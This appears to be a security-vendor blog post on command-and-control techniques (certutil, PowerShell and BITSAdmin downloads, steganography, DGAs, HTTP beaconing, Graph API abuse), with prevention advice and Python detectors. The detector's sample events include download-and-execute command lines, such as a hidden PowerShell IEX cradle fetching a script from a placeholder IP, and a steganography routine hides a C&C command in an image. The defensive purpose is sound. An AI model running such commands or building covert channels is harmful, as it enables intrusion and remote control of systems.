In this blog series, we explore security validation techniques for the preemptive protection of networks, applications, and data. The scenario templates for the various threats are based on the most popular ones used among our customers.
In the previous posts of this series, we discussed credential dumping executions, which harvest credentials that attackers then abuse to extend their foothold, and data exfiltration executions that lead to data theft.
The third template topic relates to one of the most dangerous and damaging types of tactics: Command and Control (C&C) attacks.
The goal of C&C is to give the attacker a reliable, covert channel to a compromised asset in the target environment, over which the later stages of the attack are directed. In practice, a working C&C channel lets attackers remotely control systems, exfiltrate data, and push additional malware to other devices. Because every later stage depends on this channel, detecting or blocking it cuts the attack short.
Most Popular C&C Execution Techniques
Download file using Certutil (urlcache): Certutil is a built-in Windows command-line utility for managing certificates and certificate services. Its ‘-urlcache’ option, intended to display or manage the URL cache, will also fetch an arbitrary remote file over HTTP or HTTPS when combined with ‘-f’ (typically ‘certutil -urlcache -split -f <URL> <output file>’), which makes it a popular living-off-the-land downloader.
Recommended prevention: Monitor certutil command lines for ‘-urlcache’ combined with a URL, alert on certutil.exe making outbound network connections (it has no reason to reach arbitrary web servers), and restrict its execution to administrators where possible.
Windows – PowerShell Download: PowerShell is the built-in shell and scripting language for Windows administration. Because it can call .NET directly, a one-liner such as ‘(New-Object Net.WebClient).DownloadString(<URL>)’ piped to ‘Invoke-Expression’ downloads and runs code entirely in memory, without ever writing a file to disk; ‘Invoke-WebRequest’ offers the same download capability.
Recommended prevention: Restrict PowerShell to the users who need it (Constrained Language Mode or application control for everyone else), enable Script Block Logging (event ID 4104) so that obfuscated download cradles are recorded in decoded form, and alert on download cradles and on hidden-window or encoded-command launches.
Windows – BITSAdmin BITS Download: BITSAdmin is a deprecated but still shipped command-line tool for managing Background Intelligent Transfer Service (BITS) jobs in Windows. Because BITS downloads run inside a trusted system service, survive reboots, and can be given a ‘/SetNotifyCmdLine’ command to execute when the transfer completes, a job created with ‘bitsadmin /transfer’ lets an attacker both download and launch a payload while blending in with legitimate update traffic.
Recommended prevention: Restrict bitsadmin.exe execution where possible, alert on ‘/transfer’ jobs that reference external URLs and on any use of ‘/SetNotifyCmdLine’, and review BITS job history in the Microsoft-Windows-Bits-Client/Operational event log.
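The three download techniques above share one detection surface: the process creation event, where the image name and command line are visible. The following detector is an added example written for this post (it is not Cymulate code and not part of the template); it runs a small rule set over constructed process-creation events in the shape of Sysmon event 1 or Security event 4688 fields. The events, IP address and file names are made up for the example.

```python
import re

# Constructed process-creation events (Sysmon event 1 / Security event 4688 style
# Image and CommandLine fields). Sample data for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/payload.exe C:\Users\Public\p.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify -urlfetch C:\certs\server.cer"},          # benign: CRL/AIA check
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},  # benign
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 /download /priority high http://198.51.100.7/b.dll C:\Users\Public\b.dll"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin.exe /list /allusers"},                                  # benign: just lists jobs
]

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

RULES = [
    # (technique label, image basenames the rule applies to, pattern the command line must match)
    ("certutil -urlcache download", {"certutil.exe"},
     # plain '-urlcache' only lists the cache; a URL on the same command line means a fetch
     re.compile(r"-urlcache\b.*https?://", re.I)),
    ("PowerShell download cradle", {"powershell.exe", "pwsh.exe"},
     # no URL required: the target is often held in a variable or an encoded command
     re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                r"Invoke-RestMethod|\birm\b|Start-BitsTransfer", re.I)),
    ("BITSAdmin /transfer download", {"bitsadmin.exe"},
     re.compile(r"/transfer\b.*https?://", re.I)),
]


def classify(event):
    """Return the technique labels matched by one process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    return [label for label, images, pat in RULES if image in images and pat.search(cmd)]


def extract_urls(cmd):
    """Pull every http(s) URL out of a command line for enrichment/blocking."""
    return URL_RE.findall(cmd)


def scan(events):
    """Map event index -> {"techniques": [...], "urls": [...]} for events that match a rule."""
    findings = {}
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            findings[i] = {"techniques": labels, "urls": extract_urls(ev["CommandLine"])}
    return findings


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(f['techniques'])} -> {f['urls']}")
```

Two of the six constructed events are legitimate uses of the same binaries, which is why each rule looks for the download-specific switch plus a URL rather than for the tool name alone. Command-line matching is still bypassable with obfuscation, so pair it with PowerShell Script Block Logging and with network telemetry (Sysmon event 3) showing certutil.exe or bitsadmin.exe opening outbound connections.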
Data Obfuscation – Steganography: Steganography is the practice of hiding data inside another file, such as an image or audio file, without a visible change to the carrier. Attackers use it both to smuggle payloads and C&C commands into a network inside innocuous-looking files and to carry stolen data out, defeating content inspection that looks only at file type and known signatures.
Recommended prevention: Use tools that apply statistical steganalysis to media crossing the perimeter (signature scanning will not see the hidden payload), baseline which hosts exchange image files with which external sites, and treat a process that downloads an image and then spawns a script interpreter as suspicious.
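To make concrete why the carrier looks unchanged, here is an added example (written for this post, not Cymulate code) of the simplest image steganography scheme: a C&C command is written into the least significant bit of each 8-bit colour sample of a constructed RGB buffer, so no sample moves by more than one unit. The cover "image" is a synthetic gradient rather than a real file, and the command string is made up.

```python
WIDTH, HEIGHT = 64, 32
# Constructed cover "image": raw 8-bit RGB samples forming a smooth gradient (not a real file).
COVER = bytes(((x * 3) + c * 40) % 256 for x in range(WIDTH * HEIGHT) for c in range(3))


def embed(cover: bytes, payload: bytes) -> bytes:
    """Hide payload in the least significant bit of consecutive cover samples.
    Layout: 32-bit big-endian payload length, then the payload bits, MSB first."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small: one bit per sample")
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit        # clear LSB, then set it to the payload bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Recover the payload written by embed(); raises if the header is implausible."""
    def read_bits(count: int, offset: int) -> int:
        value = 0
        for i in range(count):
            value = (value << 1) | (stego[offset + i] & 1)
        return value

    length = read_bits(32, 0)
    if 32 + 8 * length > len(stego):
        raise ValueError("no valid LSB payload header")
    return bytes(read_bits(8, 32 + 8 * k) for k in range(length))


def max_sample_delta(a: bytes, b: bytes) -> int:
    """Largest per-sample change between cover and stego image (LSB embedding gives at most 1)."""
    return max(abs(x - y) for x, y in zip(a, b))


if __name__ == "__main__":
    command = b"sleep=60;cmd=whoami"             # constructed C&C instruction
    stego = embed(COVER, command)
    print("recovered:", extract(stego))
    print("max sample change:", max_sample_delta(COVER, stego))
```

A scanner that hashes the file or matches signatures sees an ordinary image; only a statistical test on the LSB plane (the chi-square "pairs of values" attack is the classic one) notices that the low bits no longer follow the image's natural distribution. Note also that this scheme survives only lossless formats such as PNG or BMP; JPEG recompression destroys the LSB plane, which is why real tooling for lossy formats embeds in the frequency-domain coefficients instead.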
Domain Generation Algorithm – Locky Trojan C&C: Locky is a notorious ransomware family used in several high-profile campaigns. One of its features is a Domain Generation Algorithm (DGA): a seeded algorithm that produces a fresh set of domain names on a schedule, which the malware tries in turn until one resolves to a live C&C server. Because the attacker knows the seed and registers only the domains actually needed, static blocklists lag behind, and control of the infected system survives even after individual domains are sinkholed or taken down.
Recommended prevention: Route all DNS through resolvers you log and filter, alert on hosts that produce bursts of NXDOMAIN responses for random-looking domains (the signature of a DGA walking its candidate list), and use DNS security feeds that classify known DGA families.
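The NXDOMAIN-burst pattern above is easy to hunt for in resolver logs. The following is an added example for this post (not Cymulate code, and not a reimplementation of Locky's actual algorithm): it scores the registrable label of each queried name on four lexical features and flags a client that produces several failed lookups of high-scoring names. The log lines, client addresses and random-looking domains are constructed for the example, and the feature thresholds are hand-picked.

```python
import math
from collections import defaultdict

VOWELS = set("aeiou")

# Constructed resolver log, format '<timestamp> <client_ip> <qname> <rcode>'. Not real data,
# and the random-looking names are made up rather than produced by any real DGA.
SAMPLE_DNS_LOG = [
    "2024-03-04T10:00:01Z 10.0.0.5 microsoft.com NOERROR",
    "2024-03-04T10:00:02Z 10.0.0.5 xkqzvpwtlmgha.ru NXDOMAIN",
    "2024-03-04T10:00:02Z 10.0.0.5 bqtwmnrgfslv.info NXDOMAIN",
    "2024-03-04T10:00:03Z 10.0.0.5 a8kd3lqzp9.com NXDOMAIN",
    "2024-03-04T10:00:03Z 10.0.0.5 zrhpqvtkxwbnmj.biz NOERROR",     # the one that resolved: live C&C
    "2024-03-04T10:00:05Z 10.0.0.9 login.microsoftonline.com NOERROR",
    "2024-03-04T10:00:06Z 10.0.0.9 stackoverflow.com NOERROR",
    "2024-03-04T10:00:07Z 10.0.0.9 exanple.com NXDOMAIN",            # an ordinary typo
]


def shannon_entropy(s: str) -> float:
    """Bits per character of the label's character distribution."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_nonvowel_run(s: str) -> int:
    """Pronounceable words rarely exceed 3-4 consonants in a row; random strings do."""
    best = run = 0
    for ch in s:
        run = 0 if ch in VOWELS else run + 1
        best = max(best, run)
    return best


def registrable_label(domain: str) -> str:
    # Assumption for this example: single-label TLDs (.com, .ru). A production version
    # uses the Public Suffix List so that co.uk, com.br and friends are handled correctly.
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(domain: str) -> int:
    """Number of DGA-like lexical features present (0-4). Thresholds hand-picked for the example."""
    label = registrable_label(domain)
    vowel_ratio = sum(ch in VOWELS for ch in label) / max(len(label), 1)
    return sum([
        len(label) >= 12,
        vowel_ratio < 0.25,
        longest_nonvowel_run(label) >= 5,
        shannon_entropy(label) > 3.2,
    ])


def find_dga_hosts(log_lines, score_threshold=3, min_hits=3):
    """Return {client_ip: [domains]} for clients with >= min_hits distinct NXDOMAIN
    lookups of names scoring at or above score_threshold."""
    hits = defaultdict(set)
    for line in log_lines:
        _ts, client, qname, rcode = line.split()
        if rcode == "NXDOMAIN" and dga_score(qname) >= score_threshold:
            hits[client].add(qname.lower())
    return {host: sorted(names) for host, names in hits.items() if len(names) >= min_hits}


if __name__ == "__main__":
    for host, names in find_dga_hosts(SAMPLE_DNS_LOG).items():
        print(f"{host}: {len(names)} DGA-like NXDOMAINs, e.g. {names[0]}")
```

Single features are noisy: stackoverflow.com and microsoftonline.com both score 2 (long and high-entropy) but never reach the threshold because they are pronounceable, so the host-level aggregation of failed lookups does as much work as the per-name score. Once a host is flagged, the one candidate that did resolve (zrhpqvtkxwbnmj.biz in the constructed log) is the live C&C domain worth blocking and pivoting on.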
POST Request with data as text: Attackers commonly run C&C over plain HTTP(S). The infected host periodically sends a POST request whose body carries a check-in or collected data as plain text, and the C&C server returns its commands in the response. Because this looks like an ordinary form submission or API call, it passes through proxies and firewalls that allow outbound web traffic.
Recommended prevention: Inspect outbound HTTP(S) at a proxy (with TLS inspection where policy allows), alert on POST traffic that is highly periodic, goes to bare IP addresses or newly registered domains, or carries unusual content types and user agents, and block outbound web access from servers that have no business need for it.
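The periodicity mentioned above is the feature that most distinguishes an implant's check-in POSTs from a user's form submissions. As an added example for this post (not Cymulate code), the function below groups POST requests in a constructed proxy log by source and destination, measures how regular the inter-request gaps are (coefficient of variation: standard deviation divided by mean), and flags the near-constant streams. The log lines, addresses and paths are made up.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log, format '<timestamp> <src_ip> <dst_ip> <method> <path> <status> <bytes_out>'.
# Not real traffic.
SAMPLE_PROXY_LOG = [
    # implant check-in: a POST every ~60 s to a bare IP with a small, fixed-size text body
    "2024-03-04T10:00:00Z 10.0.0.5 198.51.100.7 POST /api/v1/status 200 312",
    "2024-03-04T10:01:02Z 10.0.0.5 198.51.100.7 POST /api/v1/status 200 312",
    "2024-03-04T10:02:01Z 10.0.0.5 198.51.100.7 POST /api/v1/status 200 312",
    "2024-03-04T10:03:03Z 10.0.0.5 198.51.100.7 POST /api/v1/status 200 312",
    "2024-03-04T10:03:59Z 10.0.0.5 198.51.100.7 POST /api/v1/status 200 312",
    "2024-03-04T10:05:01Z 10.0.0.5 198.51.100.7 POST /api/v1/status 200 312",
    # ordinary browsing from another host: POSTs at irregular, human intervals
    "2024-03-04T10:00:05Z 10.0.0.9 203.0.113.10 GET /index.html 200 0",
    "2024-03-04T10:00:05Z 10.0.0.9 203.0.113.10 POST /login 302 180",
    "2024-03-04T10:00:09Z 10.0.0.9 203.0.113.10 POST /search 200 64",
    "2024-03-04T10:02:30Z 10.0.0.9 203.0.113.10 POST /cart 200 410",
    "2024-03-04T10:07:12Z 10.0.0.9 203.0.113.10 POST /checkout 200 1500",
    "2024-03-04T10:07:40Z 10.0.0.9 203.0.113.10 POST /checkout 200 1480",
]


def parse_line(line: str) -> dict:
    """Split one constructed proxy log line into fields, parsing the timestamp."""
    ts, src, dst, method, path, status, size = line.split()
    return {
        "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
        "src": src, "dst": dst, "method": method, "path": path,
        "status": int(status), "bytes_out": int(size),
    }


def beacon_candidates(lines, min_requests=5, max_cv=0.15):
    """Return {(src, dst): {"count", "mean_interval", "cv"}} for POST streams with at least
    min_requests requests whose inter-request gaps have a coefficient of variation <= max_cv."""
    stamps_by_pair = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev["method"] == "POST":
            stamps_by_pair[(ev["src"], ev["dst"])].append(ev["ts"])

    candidates = {}
    for pair, stamps in stamps_by_pair.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        mean_gap = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean_gap if mean_gap else 0.0
        if cv <= max_cv:
            candidates[pair] = {"count": len(stamps),
                                "mean_interval": round(mean_gap, 1),
                                "cv": round(cv, 3)}
    return candidates


if __name__ == "__main__":
    for (src, dst), info in beacon_candidates(SAMPLE_PROXY_LOG).items():
        print(f"{src} -> {dst}: {info['count']} POSTs every ~{info['mean_interval']}s (cv={info['cv']})")
```

In the constructed data the implant's gaps are 62, 59, 62, 56 and 62 seconds (cv about 0.04) while the shopper's gaps range from 4 to 282 seconds, so only the first pair is reported. Real implants add deliberate jitter to defeat exactly this test, so in production the cv threshold is combined with other signals from the same log: a bare-IP or newly registered destination, a constant request size, and a plain-text content type on a path that never receives GETs.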
Microsoft Graph API – Sendmail (refresh token auth): Microsoft Graph is the REST API through which applications interact with Microsoft 365 services such as Exchange Online and OneDrive. It authenticates with OAuth 2.0 tokens, and a long-lived refresh token can be exchanged for fresh access tokens without re-entering a password or completing an MFA prompt. An attacker who obtains a refresh token, whether by authenticating with credentials harvested through the dumping methods covered in the first post of this series or by stealing the token itself from a compromised device, can use Graph as a C&C and exfiltration channel that blends in with legitimate cloud traffic; in this execution the attacker calls the sendMail endpoint to send email from the compromised mailbox.
Recommended prevention: Enforce multi-factor authentication and Conditional Access (including device compliance and token protection where available), monitor sign-in and audit logs for tokens used from new locations, unfamiliar client applications or non-interactive sign-ins, revoke the refresh tokens of any account suspected to be compromised, and alert on unusual mail-sending volume or recipients.
Preventing Attackers from Activating Command and Control Methods
Most of the preventions recommended above fall into two control families: network controls, such as a tuned intrusion detection or prevention system (IDS/IPS), firewalls, and DNS or web filtering, which stop the channel itself, and endpoint controls, such as application control and execution prevention, which stop unapproved tools or code from running in the first place.
To be effective, these tools must be tuned to the environment they protect: the binaries, scripts and destinations that are legitimate on one network are suspicious on another. Tuning them by hand is resource-intensive and error-prone, and is often postponed for lack of time.
Preemptively running the Cymulate Command and Control template with the seven executions listed above, either chained or atomically, is an easy-to-implement and effective proactive measure: each execution either gets blocked, which confirms the control works, or succeeds, which pinpoints the rule that needs tuning. Additionally, simulating these techniques can be leveraged to test C&C-specific incident response plans and identify areas for improvement.